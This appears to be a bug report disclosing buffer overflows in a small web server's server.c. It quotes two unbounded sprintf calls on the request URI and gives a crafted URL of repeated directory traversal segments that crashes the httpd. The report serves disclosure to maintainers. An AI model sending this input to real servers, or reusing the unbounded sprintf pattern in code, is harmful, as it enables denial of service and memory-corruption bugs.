#1 Exploitable buffer overflows in server.c

[neotek]

In server.c line 187:
sprintf(z,"Index of %s" CRLF,r->uri);
and line 204 and 205:
sprintf(z,"<HTML><HEAD><TITLE>Index of %s</TITLE></HEAD><BODY>"
"<H1>Index of %s</H1><PRE>",r->uri,r->uri);

If a directory exists off htdocs, both of these may be exploited by going to:
http://server/blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/../blah/
where blah is the name of the directory. Obviously, shorter directory names will need more repetitions, and longer directory names will need fewer repetitions.
In this form, it is a DoS attack and crashes the httpd.

Several of the strcpy/sprintfs also look dodgy.